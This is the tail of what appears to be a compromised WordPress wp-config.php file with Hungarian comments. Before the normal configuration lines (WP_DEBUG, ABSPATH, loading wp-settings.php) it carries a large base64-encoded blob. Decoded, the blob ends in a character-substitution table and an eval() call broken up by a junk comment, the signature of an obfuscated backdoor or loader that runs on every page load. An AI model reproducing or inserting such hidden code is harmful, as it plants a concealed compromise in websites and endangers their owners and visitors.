FanJ6RWpyekVqdnVIdHJ6RWpyekVqcnpFanJ6RWp2dUh0cnpFanJ6RWpyekZoS3U4anJ6RWp2dUh0S3U4anJ6RWpUOUInLgonUzNQd2RvWHlqM1BXdmFQZmRhY2dHb2NCdjNYTUozWFk4dHVIdHJ6RWpybVlXekdFanJ6RWpyekVqN0QzanRtV0hVQzZKb0dNNVUxJy4KJ2htVDJ3S29YMXNvWHhxYWNoUTNEYUp0emJkcnppaHJLRWRLdThqcnpFanJ6RWpybVlXekdFanJ6RWpyekVqcnpFaicuCidybWZKYW1CUW9HRm5VOUJKcExIdHJ6RWpyekVqcnpGaEt1OGpyekVqcnpFanJjQllVWG5XekdFanJ6RWpyekVqbExIdHJ6RWpyekVqcnpFanJ6RWpVQ0JIYScuCicyZlNyaVRNb21XSnBMSHRyekVqcnpFanJ6RmhLdThqcnpFanZ1SHRLdThqcnpFalRDaFFURGc1N3pFOGZnaEtxSGhrT25uajMyWmpmY3NKJy4KJ2xxSCtmbVRNb21CSnR1SHRyekVqcm1ZV3pHRWpyekVqcnpFamZjd01hY2lqME9FYmFDZ1lhRG5OS3U4anJ6RWpyekUnLgonanJ6d2IzMndNMlhzSmxPRWhyendJVDJiTkt1OGpyekVqdnVIdEt1OGpyekVqN0QzanR6aWJUY2dIM09iV3pHRWpyekZOS3U4anJ6RWpyeicuCidFanJjVFZVQ0JNM1hqanR6d3ZuaWhxQnpGTVVRRWI3WEJ4MHF5YmFDZ1lhRG5kS3U4aicuCidyekVqcnpFanJtWVd6R0VqcnpFanJ6RWpyekVqcnp3YjMyd01yS0hqZm1UTW9tQkpwTEh0cnpFanJ6RWpyekVqcnpFamZjd01hY2d2N1hCeHJLSGpmY3NKbHFZVycuCid6R0VqcnpFanJ6RWp2dUh0cnpFanJtSFd6akh0cnpFanJ6d2IzMndNcktIanVtQlNVWEJRN0RnWTcyZEp0Y1dBMlh3SjNQZnhVbXU4M0NnQVRxM0gyWHdKM1hoYlRPamJUJy4KJ2NnSDNPYllyendiMzJ3TTJYc0psT2JkcExIdEt1OGpyekVqN0QzanRjSkFVWEJIdHp3YjMyd01EUWFNN1FhYXRPRUNmR0UnLgonYjNQV3YzMkJIN0tIaGZjd01hY2dvZlhnSWYxSGRLdThqcnpFamxMSHRyekVqcnpFanJ6RmRUR0U4ZmN3TWFjZ29mWGk5Mk9FaDBPRTk3TycuCidVZEt1OGpyekVqcnpFanJtWVd6R0VqcnpFanJ6RWpyekVqcnp3ZHJLSGp1MmZRMzJiOEt1OGpyekVqcnpFanJ6RWpyekVqcnpFamZQRlhmUScuCidFaDBHRkVVY01MYUNCUVVYSlZvR2pka0VIdHJ6RWpyekVqcnpFanJ6RWpyekVqcnphQWFHVWowcXlqZkFpU1p6SFFmUUxXekdFanJ6RWpyekVqcnpFanJ6Jy4KJ0VqcnpFOTNEWTlyS0grcnp3YjMyd01EUWFNN1FhYWtFSHRyekVqcnpFanJ6RWpyekVqdHFZV3pHRWpyekVqcnpFanJ6RWpyY0I1N2NlanVtV0pVQ0pNb2NKUlRPJy4KJ2piN09iTkt1OGpyekVqcnpFanJ6RWpyekZKbGNKSHBMSHRyekVqcnpFanJ6RmhLdThqcnpFanJ6RWpyY0JZVVhCZFRHRTgnLgonZmN3TWFjZ29mWGk5Mk9FaDBPRTlUT1VkS3U4anJ6RWpyekVqcm1ZV3pHRWpyekVqcnpFanJ6RWpyY0JYM0RMOGZjd01hY2dvZlh1OTJPYk5LdThqcnpFanJ6RWpyJy4KJ21IV3pHRWpyekVqcnpFalRENkFUREpDcnpqYlRjZ0gzQlk5M09hYXJLSGhyemFMb21COTdEeTl0dUh0cnpFanJ6RWpyekZOS3UnLgonOGpyekVqcnpFanJ6RWpyekZkVEdqYlRjZ0gzQlk5VVhpOTJPRWgwT0U5M0R3YmZRYld6R0VqcnpFanJ6RWpyekVqcm1ZV3pHRWpyekVqcnpFanJ6RScuCidqcnpFanJ6RjVVMWhMb21COTdEeHYzRHdidHp3YjMyd01EUWFMZjFIWXJ6d2IzMndNRFFhYmYxSGRwTEh0cnpFanJ6RWpyekVqcnpFanZ1SHRyekUnLgonanJ6RWpyekVqcnpFalRENkFUREpDdHp3YjMyd01EUWFBM09hYXJLSGhyemFRVERIOXR1SHRyekVqcnpFanJ6Jy4KJ0VqcnpFamxMSHRyekVqcnpFanJ6RWpyekVqcnpFanJjV0EyUEZZYURhZG9KaFFUREg4ZmN3TWFjZ29mUEU5Mk9iTkt1OGpyekVqcnpFanJ6RWpyekZoS3U4anJ6RWonLgoncnpFanJtSFd6R0VqcnpFanJ6RWpURFc4b1FFYlRjZ0gzQlk5M0RZOTJxWVd6R0VqcnpFanJ6RWpUMk1kYXpqZHAnLgonTEh0cnpFanJtSFd6akh0cnpFanJjV0EyUEZZYURhZG9KaFlvWGdidHpiTkt1ZGgnOwokYmNtcnFoenIgPSBBcnJheSgnMSc9PicxJywgJzAnPT4nUCcsICczJz0+J1knLCAnMic9PidYJywgJzUnPT4naicsICc0Jz0+J3EnLCAnNyc9PidhJywgJzYnPT4neCcsICc5Jz0+J24nLCAnOCc9PidvJywgJ0EnPT4neicsICdDJz0+J20nLCAnQic9PidWJywgJ0UnPT4nQScsICdEJz0+J1cnLCAnRyc9PidpJywgJ0YnPT4nQicsICdJJz0+J3InLCAnSCc9PicwJywgJ0snPT4nRCcsICdKJz0+J2wnLCAnTSc9PidoJywgJ0wnPT4ndycsICdPJz0+J1MnLCAnTic9Pic3JywgJ1EnPT4neScsICdQJz0+JzMnLCAnUyc9Pid1JywgJ1InPT4nNicsICdVJz0+J2MnLCAnVCc9PidaJywgJ1cnPT4nTicsICdWJz0+J3YnLCAnWSc9PidzJywgJ1gnPT4nMicsICdaJz0+J00nLCAnYSc9PidkJywgJ2MnPT4nRycsICdiJz0+J2snLCAnZSc9Pic4JywgJ2QnPT4ncCcsICdnJz0+J0YnLCAnZic9PidKJywgJ2knPT4nRScsICdoJz0+JzknLCAnayc9PidMJywgJ2onPT4nZycsICdtJz0+J0gnLCAnbCc9PidlJywgJ28nPT4nYicsICduJz0+J1UnLCAncSc9PidUJywgJ3AnPT4nTycsICdzJz0+J3QnLCAncic9PidJJywgJ3UnPT4nUScsICd0Jz0+J0snLCAndyc9PidSJywgJ3YnPT4nZicsICd5Jz0+JzQnLCAneCc9Pic1JywgJ3onPT4nQycpOwpldmFsLyp3a2JseGdtendhKi8oenpueHJvKCRua2pianRoeW4sICRiY21ycWh6cikpOwp9")); /*res? mód. * * Engedélyezzük ezt a megjegyzések megjelenítéséhez a fejlesztés során. * Er?sen ajánlott, hogy a b?vítmény és sablon fejleszt?k használják a WP_DEBUG * konstansot. */ define('WP_DEBUG', false); /* Ennyi volt, kellemes blogolást! */ /** A WordPress könyvtár abszolút elérési útja. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /** Betöltjük a WordPress változókat és szükséges fájlokat. */ require_once(ABSPATH . 'wp-settings.php');